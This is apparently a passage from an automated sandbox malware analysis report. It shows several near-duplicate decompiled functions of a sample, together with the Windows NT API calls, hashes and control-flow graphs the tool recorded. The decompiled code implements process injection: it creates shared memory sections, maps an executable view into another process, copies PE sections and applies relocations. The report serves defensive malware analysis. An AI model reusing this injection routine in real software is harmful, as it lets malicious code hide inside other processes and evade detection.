                    											if(0 != 0) {
                    												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t165;
                    												__eflags =  *((intOrPtr*)(0 +  *(_t199 - 0x48) + _t175));
                    											}
                    											asm("loop 0xffffffe9");
                    										}
                    										_pop(_t195);
                    										_t173 = 0;
                    										__eflags = 0;
                    										_t109 = _t199 - 4;
                    										 *_t109 = 0;
                    										 *((intOrPtr*)(_t127 + 0x98))( *(_t199 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t195 + 0x28)) +  *(_t199 - 0x40),  *(_t199 - 0x3c), _t109, 0);
                    									} else {
                    										L53();
                    										_pop(_t176);
                    										_t173 = _t176 - 0x16ee;
                    										 *((intOrPtr*)(_t173 + 0x1722)) = _t173 + 0x2bbb;
                    										L004011C3();
                    										0x33(_t173 + 0x2bbb, 0x1ad);
                    										 *((intOrPtr*)(_t173 + 0x1747)) = _t173 + 0x2c0b;
                    										0x33();
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				_t92 = 0x1474;
                    				_push(0x379);
                    			}

                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401555
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401596
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015C7
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004015E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: aa239b2ee7b7a1a0b3ffb45dfca917dbddb9bacbaae0f77fc96c0f4f43538294
                    • Instruction ID: 875affe5b8015aa942028eb222aca49a3761eb159d59d404aa124f65acbec2ce
                    • Opcode Fuzzy Hash: aa239b2ee7b7a1a0b3ffb45dfca917dbddb9bacbaae0f77fc96c0f4f43538294
                    • Instruction Fuzzy Hash: 83511B74900249BFEB208F91CC89FEFBBB8EF85B10F104159F951AA2A5D7749945CB24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    control_flow_graph 164 40145d-401482 call 401134 171 401484 164->171 172 401487-40148c 164->172 171->172 174 4017b2-4017ba 172->174 175 401492-4014a3 172->175 174->172 178 4017b0-4017d3 175->178 179 4014a9-4014d2 175->179 186 4017e5 178->186 179->178 187 4014d8-4014ef NtDuplicateObject 179->187 187->178 188 4014f5-401519 NtCreateSection 187->188 191 401575-40159b NtCreateSection 188->191 192 40151b-40153c NtMapViewOfSection 188->192 191->178 195 4015a1-4015a5 191->195 192->191 194 40153e-40155a NtMapViewOfSection 192->194 194->191 196 40155c-401572 194->196 195->178 197 4015ab-4015cc NtMapViewOfSection 195->197 196->191 197->178 198 4015d2-4015ee NtMapViewOfSection 197->198 198->178 200 4015f4 call 4015f9 198->200
                    C-Code - Quality: 57%
                    			E0040145D(void* __edi, void* __eflags) {
                    				void* _t84;
                    				intOrPtr _t87;
                    				long _t90;
                    				void* _t91;
                    				struct _GUID _t98;
                    				struct _GUID _t100;
                    				PVOID* _t102;
                    				PVOID* _t104;
                    				intOrPtr* _t108;
                    				PVOID* _t120;
                    				PVOID* _t122;
                    				intOrPtr _t126;
                    				long* _t130;
                    				signed int _t137;
                    				int _t138;
                    				intOrPtr _t155;
                    				void* _t160;
                    				intOrPtr* _t161;
                    				void* _t164;
                    				long _t172;
                    				intOrPtr _t174;
                    				void* _t175;
                    				long* _t180;
                    				intOrPtr* _t182;
                    				HANDLE* _t183;
                    				HANDLE* _t184;
                    				void* _t189;
                    				void* _t190;
                    				intOrPtr* _t193;
                    				void* _t194;
                    				void* _t197;
                    				void* _t198;
                    				void* _t200;
                    				void* _t202;
                    				intOrPtr* _t203;
                    				long _t221;
                    				void* _t227;
                    
                    				asm("outsd");
                    				E00401134(_t84, __edi, __eflags, _t227);
                    				_t126 =  *((intOrPtr*)(_t198 + 8));
                    				_t172 = 0;
                    				 *((intOrPtr*)(_t198 - 0x34)) = 0;
                    				if(gs != 0) {
                    					 *((intOrPtr*)(_t198 - 0x34)) =  *((intOrPtr*)(_t198 - 0x34)) + 1;
                    				}
                    				while(1) {
                    					_t87 =  *((intOrPtr*)(_t126 + 0x48))();
                    					if(_t87 != 0) {
                    						break;
                    					}
                    					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
                    				}
                    				 *((intOrPtr*)(_t198 - 0x5c)) = _t87;
                    				_t180 = _t198 - 0x60;
                    				 *_t180 = _t172;
                    				 *((intOrPtr*)(_t126 + 0x4c))(_t87, _t180);
                    				_t90 =  *_t180;
                    				if(_t90 != 0) {
                    					_t130 = _t198 - 0x30;
                    					 *_t130 = _t90;
                    					_t130[1] = _t172;
                    					_t182 = _t198 - 0x28;
                    					 *((intOrPtr*)(_t126 + 0x10))(_t182, 0x18);
                    					 *_t182 = 0x18;
                    					_push(_t198 - 0x30);
                    					_push(_t182);
                    					_push(0x40);
                    					_push(_t198 - 0x10);
                    					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject( *(_t198 - 0x10), 0xffffffff, 0xffffffff, _t198 - 0xc, _t172, _t172, 2) == 0) {
                    						 *(_t198 - 8) = _t172;
                    						_t98 = _t198 - 0x50;
                    						 *(_t98 + 4) = _t172;
                    						 *_t98 = 0x5000;
                    						_t183 = _t198 - 0x54;
                    						if(NtCreateSection(_t183, 6, _t172, _t98, 4, 0x8000000, _t172) == 0) {
                    							 *_t25 =  *(_t198 - 0x50);
                    							_t120 = _t198 - 0x44;
                    							 *_t120 = _t172;
                    							if(NtMapViewOfSection( *_t183, 0xffffffff, _t120, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 4) == 0) {
                    								_t122 = _t198 - 0x3c;
                    								 *_t122 = _t172;
                    								if(NtMapViewOfSection( *_t183,  *(_t198 - 0xc), _t122, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 4) == 0) {
                    									_t197 =  *(_t198 - 0x44);
                    									 *((intOrPtr*)(_t126 + 0x20))(_t172, _t197, 0x104);
                    									 *((intOrPtr*)(_t197 + 0x208)) =  *((intOrPtr*)(_t198 + 0x14));
                    									 *(_t198 - 8) =  *(_t198 - 8) + 1;
                    								}
                    							}
                    						}
                    						_t100 = _t198 - 0x50;
                    						 *(_t100 + 4) = _t172;
                    						 *_t100 =  *((intOrPtr*)(_t198 + 0x10)) + 0x10000;
                    						_t184 = _t198 - 0x58;
                    						if(NtCreateSection(_t184, 0xe, _t172, _t100, 0x40, 0x8000000, _t172) == 0 &&  *(_t198 - 8) != 0) {
                    							 *_t46 =  *(_t198 - 0x50);
                    							_t102 = _t198 - 0x48;
                    							 *_t102 = _t172;
                    							if(NtMapViewOfSection( *_t184, 0xffffffff, _t102, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 4) == 0) {
                    								_t104 = _t198 - 0x40;
                    								 *_t104 = _t172;
                    								_t221 = NtMapViewOfSection( *_t184,  *(_t198 - 0xc), _t104, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 0x20);
                    								if(_t221 == 0) {
                    									L19();
                    									if(_t221 == 0 && _t221 != 0) {
                    										asm("xlatb");
                    										asm("rcl dword [ebx], 0x8b");
                    									}
                    									_t202 = _t200 + 4;
                    									_push(0x2eb0);
                    									_t203 = _t202 + 4;
                    									_push(0x2260);
                    									_t155 =  *_t203;
                    									_push(_t155);
                    									asm("lodsb");
                    									asm("loop 0xffffffc9");
                    									_t189 =  *((intOrPtr*)(_t198 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t198 + 0xc))));
                    									_t137 =  *(_t189 + 6) & 0x0000ffff;
                    									_push(_t189);
                    									_t160 = _t189;
                    									if( *((intOrPtr*)(_t198 - 0x34)) == 0) {
                    										_t161 = _t160 + 0xf8;
                    										__eflags = _t161;
                    									} else {
                    										_t161 = _t160 + 0x108;
                    									}
                    									_push(_t137);
                    									_t138 =  *(_t161 + 0x10);
                    									if(_t138 != 0) {
                    										memcpy( *((intOrPtr*)(_t161 + 0xc)) +  *(_t198 - 0x48),  *((intOrPtr*)(_t161 + 0x14)) +  *((intOrPtr*)(_t198 + 0xc)), _t138);
                    									}
                    									asm("loop 0xffffffe6");
                    									_pop(_t190);
                    									if( *((intOrPtr*)(_t198 - 0x34)) == 0) {
                    										_push(_t190);
                    										_t164 =  *((intOrPtr*)(_t190 + 0x34)) -  *(_t198 - 0x40);
                    										_t193 =  *((intOrPtr*)(_t190 + 0xa0)) +  *(_t198 - 0x48);
                    										__eflags = _t193;
                    										while(1) {
                    											__eflags =  *_t193;
                    											if( *_t193 == 0) {
                    												break;
                    											}
                    											_t174 =  *_t193;
                    											_t193 = _t193 + 8;
                    											asm("lodsw");
                    											__eflags = 0;
                    											if(0 != 0) {
                    												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t164;
                    												__eflags =  *((intOrPtr*)(0 +  *(_t198 - 0x48) + _t174));
                    											}
                    											asm("loop 0xffffffe9");
                    										}
                    										_pop(_t194);
                    										_t172 = 0;
                    										__eflags = 0;
                    										_t108 = _t198 - 4;
                    										 *_t108 = 0;
                    										 *((intOrPtr*)(_t126 + 0x98))( *(_t198 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t194 + 0x28)) +  *(_t198 - 0x40),  *(_t198 - 0x3c), _t108, 0);
                    									} else {
                    										L52();
                    										_pop(_t175);
                    										_t172 = _t175 - 0x16ee;
                    										 *((intOrPtr*)(_t172 + 0x1722)) = _t172 + 0x2bbb;
                    										L004011C3();
                    										0x33(_t172 + 0x2bbb, 0x1ad);
                    										 *((intOrPtr*)(_t172 + 0x1747)) = _t172 + 0x2c0b;
                    										0x33();
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				_t91 = 0x1474;
                    				_push(0x379);
                    			}

                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401555
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401596
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015C7
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004015E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: c777d85a313d6204129e744fdb44d59ecbedb6b98fa3d971b816145188cb92c2
                    • Instruction ID: 64f050098b634efaf460332bf9a79526af7b9d542430e692bb7884b77a16f5e9
                    • Opcode Fuzzy Hash: c777d85a313d6204129e744fdb44d59ecbedb6b98fa3d971b816145188cb92c2
                    • Instruction Fuzzy Hash: C551FA75900249BFEB208F91CC89FAF7BB8FF85B10F104159FA11AA2A5D7749945CB24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 202 401460-401482 call 401134 206 401484 202->206 207 401487-40148c 202->207 206->207 209 4017b2-4017ba 207->209 210 401492-4014a3 207->210 209->207 213 4017b0-4017d3 210->213 214 4014a9-4014d2 210->214 221 4017e5 213->221 214->213 222 4014d8-4014ef NtDuplicateObject 214->222 222->213 223 4014f5-401519 NtCreateSection 222->223 226 401575-40159b NtCreateSection 223->226 227 40151b-40153c NtMapViewOfSection 223->227 226->213 230 4015a1-4015a5 226->230 227->226 229 40153e-40155a NtMapViewOfSection 227->229 229->226 231 40155c-401572 229->231 230->213 232 4015ab-4015cc NtMapViewOfSection 230->232 231->226 232->213 233 4015d2-4015ee NtMapViewOfSection 232->233 233->213 235 4015f4 call 4015f9 233->235
                    C-Code - Quality: 59%
                    			E00401460(signed int __eax, void* __edi) {
                    				intOrPtr _t88;
                    				long _t91;
                    				void* _t92;
                    				struct _GUID _t99;
                    				struct _GUID _t101;
                    				PVOID* _t103;
                    				PVOID* _t105;
                    				intOrPtr* _t109;
                    				PVOID* _t121;
                    				PVOID* _t123;
                    				intOrPtr _t127;
                    				long* _t132;
                    				signed int _t139;
                    				int _t140;
                    				intOrPtr _t157;
                    				void* _t162;
                    				intOrPtr* _t163;
                    				void* _t166;
                    				long _t174;
                    				intOrPtr _t176;
                    				void* _t177;
                    				long* _t182;
                    				intOrPtr* _t184;
                    				HANDLE* _t185;
                    				HANDLE* _t186;
                    				void* _t191;
                    				void* _t192;
                    				intOrPtr* _t195;
                    				void* _t196;
                    				void* _t199;
                    				void* _t200;
                    				void* _t202;
                    				void* _t204;
                    				intOrPtr* _t205;
                    				signed char _t209;
                    				long _t223;
                    				void* _t229;
                    
                    				_t85 = __eax | 0x00000076;
                    				_t209 = __eax | 0x00000076;
                    				E00401134(_t85, __edi, _t209, _t229);
                    				_t127 =  *((intOrPtr*)(_t200 + 8));
                    				_t174 = 0;
                    				 *((intOrPtr*)(_t200 - 0x34)) = 0;
                    				if(gs != 0) {
                    					 *((intOrPtr*)(_t200 - 0x34)) =  *((intOrPtr*)(_t200 - 0x34)) + 1;
                    				}
                    				while(1) {
                    					_t88 =  *((intOrPtr*)(_t127 + 0x48))();
                    					if(_t88 != 0) {
                    						break;
                    					}
                    					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
                    				}
                    				 *((intOrPtr*)(_t200 - 0x5c)) = _t88;
                    				_t182 = _t200 - 0x60;
                    				 *_t182 = _t174;
                    				 *((intOrPtr*)(_t127 + 0x4c))(_t88, _t182);
                    				_t91 =  *_t182;
                    				if(_t91 != 0) {
                    					_t132 = _t200 - 0x30;
                    					 *_t132 = _t91;
                    					_t132[1] = _t174;
                    					_t184 = _t200 - 0x28;
                    					 *((intOrPtr*)(_t127 + 0x10))(_t184, 0x18);
                    					 *_t184 = 0x18;
                    					_push(_t200 - 0x30);
                    					_push(_t184);
                    					_push(0x40);
                    					_push(_t200 - 0x10);
                    					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject( *(_t200 - 0x10), 0xffffffff, 0xffffffff, _t200 - 0xc, _t174, _t174, 2) == 0) {
                    						 *(_t200 - 8) = _t174;
                    						_t99 = _t200 - 0x50;
                    						 *(_t99 + 4) = _t174;
                    						 *_t99 = 0x5000;
                    						_t185 = _t200 - 0x54;
                    						if(NtCreateSection(_t185, 6, _t174, _t99, 4, 0x8000000, _t174) == 0) {
                    							 *_t25 =  *(_t200 - 0x50);
                    							_t121 = _t200 - 0x44;
                    							 *_t121 = _t174;
                    							if(NtMapViewOfSection( *_t185, 0xffffffff, _t121, _t174, _t174, _t174, _t200 - 0x38, 1, _t174, 4) == 0) {
                    								_t123 = _t200 - 0x3c;
                    								 *_t123 = _t174;
                    								if(NtMapViewOfSection( *_t185,  *(_t200 - 0xc), _t123, _t174, _t174, _t174, _t200 - 0x38, 1, _t174, 4) == 0) {
                    									_t199 =  *(_t200 - 0x44);
                    									 *((intOrPtr*)(_t127 + 0x20))(_t174, _t199, 0x104);
                    									 *((intOrPtr*)(_t199 + 0x208)) =  *((intOrPtr*)(_t200 + 0x14));
                    									 *(_t200 - 8) =  *(_t200 - 8) + 1;
                    								}
                    							}
                    						}
                    						_t101 = _t200 - 0x50;
                    						 *(_t101 + 4) = _t174;
                    						 *_t101 =  *((intOrPtr*)(_t200 + 0x10)) + 0x10000;
                    						_t186 = _t200 - 0x58;
                    						if(NtCreateSection(_t186, 0xe, _t174, _t101, 0x40, 0x8000000, _t174) == 0 &&  *(_t200 - 8) != 0) {
                    							 *_t46 =  *(_t200 - 0x50);
                    							_t103 = _t200 - 0x48;
                    							 *_t103 = _t174;
                    							if(NtMapViewOfSection( *_t186, 0xffffffff, _t103, _t174, _t174, _t174, _t200 - 0x38, 1, _t174, 4) == 0) {
                    								_t105 = _t200 - 0x40;
                    								 *_t105 = _t174;
                    								_t223 = NtMapViewOfSection( *_t186,  *(_t200 - 0xc), _t105, _t174, _t174, _t174, _t200 - 0x38, 1, _t174, 0x20);
                    								if(_t223 == 0) {
                    									L17();
                    									if(_t223 == 0 && _t223 != 0) {
                    										asm("xlatb");
                    										asm("rcl dword [ebx], 0x8b");
                    									}
                    									_t204 = _t202 + 4;
                    									_push(0x2eb0);
                    									_t205 = _t204 + 4;
                    									_push(0x2260);
                    									_t157 =  *_t205;
                    									_push(_t157);
                    									asm("lodsb");
                    									asm("loop 0xffffffc9");
                    									_t191 =  *((intOrPtr*)(_t200 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0xc))));
                    									_t139 =  *(_t191 + 6) & 0x0000ffff;
                    									_push(_t191);
                    									_t162 = _t191;
                    									if( *((intOrPtr*)(_t200 - 0x34)) == 0) {
                    										_t163 = _t162 + 0xf8;
                    										__eflags = _t163;
                    									} else {
                    										_t163 = _t162 + 0x108;
                    									}
                    									_push(_t139);
                    									_t140 =  *(_t163 + 0x10);
                    									if(_t140 != 0) {
                    										memcpy( *((intOrPtr*)(_t163 + 0xc)) +  *(_t200 - 0x48),  *((intOrPtr*)(_t163 + 0x14)) +  *((intOrPtr*)(_t200 + 0xc)), _t140);
                    									}
                    									asm("loop 0xffffffe6");
                    									_pop(_t192);
                    									if( *((intOrPtr*)(_t200 - 0x34)) == 0) {
                    										_push(_t192);
                    										_t166 =  *((intOrPtr*)(_t192 + 0x34)) -  *(_t200 - 0x40);
                    										_t195 =  *((intOrPtr*)(_t192 + 0xa0)) +  *(_t200 - 0x48);
                    										__eflags = _t195;
                    										while(1) {
                    											__eflags =  *_t195;
                    											if( *_t195 == 0) {
                    												break;
                    											}
                    											_t176 =  *_t195;
                    											_t195 = _t195 + 8;
                    											asm("lodsw");
                    											__eflags = 0;
                    											if(0 != 0) {
                    												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t166;
                    												__eflags =  *((intOrPtr*)(0 +  *(_t200 - 0x48) + _t176));
                    											}
                    											asm("loop 0xffffffe9");
                    										}
                    										_pop(_t196);
                    										_t174 = 0;
                    										__eflags = 0;
                    										_t109 = _t200 - 4;
                    										 *_t109 = 0;
                    										 *((intOrPtr*)(_t127 + 0x98))( *(_t200 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t196 + 0x28)) +  *(_t200 - 0x40),  *(_t200 - 0x3c), _t109, 0);
                    									} else {
                    										L50();
                    										_pop(_t177);
                    										_t174 = _t177 - 0x16ee;
                    										 *((intOrPtr*)(_t174 + 0x1722)) = _t174 + 0x2bbb;
                    										L004011C3();
                    										0x33(_t174 + 0x2bbb, 0x1ad);
                    										 *((intOrPtr*)(_t174 + 0x1747)) = _t174 + 0x2c0b;
                    										0x33();
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				_t92 = 0x1474;
                    				_push(0x379);
                    			}

                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401555
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401596
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015C7
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004015E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: 6009193819dd22e85f5db9aefac48bd8857ccca130184f1ff84ad04c18ecb97b
                    • Instruction ID: 0eb640bdefb12f4d8d79d21e94fd48f192c5c8138051fc39ed52ff1756291963
                    • Opcode Fuzzy Hash: 6009193819dd22e85f5db9aefac48bd8857ccca130184f1ff84ad04c18ecb97b
                    • Instruction Fuzzy Hash: 5D511A75900249BFEF208F91CC89FEF7BB8EF85710F104159FA11AA2A5D7709944CB24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 237 40146b-401482 call 401134 243 401484 237->243 244 401487-40148c 237->244 243->244 246 4017b2-4017ba 244->246 247 401492-4014a3 244->247 246->244 250 4017b0-4017d3 247->250 251 4014a9-4014d2 247->251 258 4017e5 250->258 251->250 259 4014d8-4014ef NtDuplicateObject 251->259 259->250 260 4014f5-401519 NtCreateSection 259->260 263 401575-40159b NtCreateSection 260->263 264 40151b-40153c NtMapViewOfSection 260->264 263->250 267 4015a1-4015a5 263->267 264->263 266 40153e-40155a NtMapViewOfSection 264->266 266->263 268 40155c-401572 266->268 267->250 269 4015ab-4015cc NtMapViewOfSection 267->269 268->263 269->250 270 4015d2-4015ee NtMapViewOfSection 269->270 270->250 272 4015f4 call 4015f9 270->272
                    C-Code - Quality: 57%
                    			E0040146B(void* __edi, void* __eflags) {
                    				void* _t84;
                    				intOrPtr _t87;
                    				long _t90;
                    				void* _t91;
                    				struct _GUID _t98;
                    				struct _GUID _t100;
                    				PVOID* _t102;
                    				PVOID* _t104;
                    				intOrPtr* _t108;
                    				PVOID* _t120;
                    				PVOID* _t122;
                    				intOrPtr _t126;
                    				long* _t130;
                    				signed int _t137;
                    				int _t138;
                    				intOrPtr _t155;
                    				void* _t160;
                    				intOrPtr* _t161;
                    				void* _t164;
                    				long _t172;
                    				intOrPtr _t174;
                    				void* _t175;
                    				long* _t180;
                    				intOrPtr* _t182;
                    				HANDLE* _t183;
                    				HANDLE* _t184;
                    				void* _t189;
                    				void* _t190;
                    				intOrPtr* _t193;
                    				void* _t194;
                    				void* _t197;
                    				void* _t198;
                    				void* _t200;
                    				void* _t202;
                    				intOrPtr* _t203;
                    				long _t221;
                    				void* _t227;
                    
                    				asm("pushfd");
                    				E00401134(_t84, __edi, __eflags, _t227);
                    				_t126 =  *((intOrPtr*)(_t198 + 8));
                    				_t172 = 0;
                    				 *((intOrPtr*)(_t198 - 0x34)) = 0;
                    				if(gs != 0) {
                    					 *((intOrPtr*)(_t198 - 0x34)) =  *((intOrPtr*)(_t198 - 0x34)) + 1;
                    				}
                    				while(1) {
                    					_t87 =  *((intOrPtr*)(_t126 + 0x48))();
                    					if(_t87 != 0) {
                    						break;
                    					}
                    					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
                    				}
                    				 *((intOrPtr*)(_t198 - 0x5c)) = _t87;
                    				_t180 = _t198 - 0x60;
                    				 *_t180 = _t172;
                    				 *((intOrPtr*)(_t126 + 0x4c))(_t87, _t180);
                    				_t90 =  *_t180;
                    				if(_t90 != 0) {
                    					_t130 = _t198 - 0x30;
                    					 *_t130 = _t90;
                    					_t130[1] = _t172;
                    					_t182 = _t198 - 0x28;
                    					 *((intOrPtr*)(_t126 + 0x10))(_t182, 0x18);
                    					 *_t182 = 0x18;
                    					_push(_t198 - 0x30);
                    					_push(_t182);
                    					_push(0x40);
                    					_push(_t198 - 0x10);
                    					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject( *(_t198 - 0x10), 0xffffffff, 0xffffffff, _t198 - 0xc, _t172, _t172, 2) == 0) {
                    						 *(_t198 - 8) = _t172;
                    						_t98 = _t198 - 0x50;
                    						 *(_t98 + 4) = _t172;
                    						 *_t98 = 0x5000;
                    						_t183 = _t198 - 0x54;
                    						if(NtCreateSection(_t183, 6, _t172, _t98, 4, 0x8000000, _t172) == 0) {
                    							 *_t25 =  *(_t198 - 0x50);
                    							_t120 = _t198 - 0x44;
                    							 *_t120 = _t172;
                    							if(NtMapViewOfSection( *_t183, 0xffffffff, _t120, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 4) == 0) {
                    								_t122 = _t198 - 0x3c;
                    								 *_t122 = _t172;
                    								if(NtMapViewOfSection( *_t183,  *(_t198 - 0xc), _t122, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 4) == 0) {
                    									_t197 =  *(_t198 - 0x44);
                    									 *((intOrPtr*)(_t126 + 0x20))(_t172, _t197, 0x104);
                    									 *((intOrPtr*)(_t197 + 0x208)) =  *((intOrPtr*)(_t198 + 0x14));
                    									 *(_t198 - 8) =  *(_t198 - 8) + 1;
                    								}
                    							}
                    						}
                    						_t100 = _t198 - 0x50;
                    						 *(_t100 + 4) = _t172;
                    						 *_t100 =  *((intOrPtr*)(_t198 + 0x10)) + 0x10000;
                    						_t184 = _t198 - 0x58;
                    						if(NtCreateSection(_t184, 0xe, _t172, _t100, 0x40, 0x8000000, _t172) == 0 &&  *(_t198 - 8) != 0) {
                    							 *_t46 =  *(_t198 - 0x50);
                    							_t102 = _t198 - 0x48;
                    							 *_t102 = _t172;
                    							if(NtMapViewOfSection( *_t184, 0xffffffff, _t102, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 4) == 0) {
                    								_t104 = _t198 - 0x40;
                    								 *_t104 = _t172;
                    								_t221 = NtMapViewOfSection( *_t184,  *(_t198 - 0xc), _t104, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 0x20);
                    								if(_t221 == 0) {
                    									L18();
                    									if(_t221 == 0 && _t221 != 0) {
                    										asm("xlatb");
                    										asm("rcl dword [ebx], 0x8b");
                    									}
                    									_t202 = _t200 + 4;
                    									_push(0x2eb0);
                    									_t203 = _t202 + 4;
                    									_push(0x2260);
                    									_t155 =  *_t203;
                    									_push(_t155);
                    									asm("lodsb");
                    									asm("loop 0xffffffc9");
                    									_t189 =  *((intOrPtr*)(_t198 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t198 + 0xc))));
                    									_t137 =  *(_t189 + 6) & 0x0000ffff;
                    									_push(_t189);
                    									_t160 = _t189;
                    									if( *((intOrPtr*)(_t198 - 0x34)) == 0) {
                    										_t161 = _t160 + 0xf8;
                    										__eflags = _t161;
                    									} else {
                    										_t161 = _t160 + 0x108;
                    									}
                    									_push(_t137);
                    									_t138 =  *(_t161 + 0x10);
                    									if(_t138 != 0) {
                    										memcpy( *((intOrPtr*)(_t161 + 0xc)) +  *(_t198 - 0x48),  *((intOrPtr*)(_t161 + 0x14)) +  *((intOrPtr*)(_t198 + 0xc)), _t138);
                    									}
                    									asm("loop 0xffffffe6");
                    									_pop(_t190);
                    									if( *((intOrPtr*)(_t198 - 0x34)) == 0) {
                    										_push(_t190);
                    										_t164 =  *((intOrPtr*)(_t190 + 0x34)) -  *(_t198 - 0x40);
                    										_t193 =  *((intOrPtr*)(_t190 + 0xa0)) +  *(_t198 - 0x48);
                    										__eflags = _t193;
                    										while(1) {
                    											__eflags =  *_t193;
                    											if( *_t193 == 0) {
                    												break;
                    											}
                    											_t174 =  *_t193;
                    											_t193 = _t193 + 8;
                    											asm("lodsw");
                    											__eflags = 0;
                    											if(0 != 0) {
                    												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t164;
                    												__eflags =  *((intOrPtr*)(0 +  *(_t198 - 0x48) + _t174));
                    											}
                    											asm("loop 0xffffffe9");
                    										}
                    										_pop(_t194);
                    										_t172 = 0;
                    										__eflags = 0;
                    										_t108 = _t198 - 4;
                    										 *_t108 = 0;
                    										 *((intOrPtr*)(_t126 + 0x98))( *(_t198 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t194 + 0x28)) +  *(_t198 - 0x40),  *(_t198 - 0x3c), _t108, 0);
                    									} else {
                    										L51();
                    										_pop(_t175);
                    										_t172 = _t175 - 0x16ee;
                    										 *((intOrPtr*)(_t172 + 0x1722)) = _t172 + 0x2bbb;
                    										L004011C3();
                    										0x33(_t172 + 0x2bbb, 0x1ad);
                    										 *((intOrPtr*)(_t172 + 0x1747)) = _t172 + 0x2c0b;
                    										0x33();
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				_t91 = 0x1474;
                    				_push(0x379);
                    			}

                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
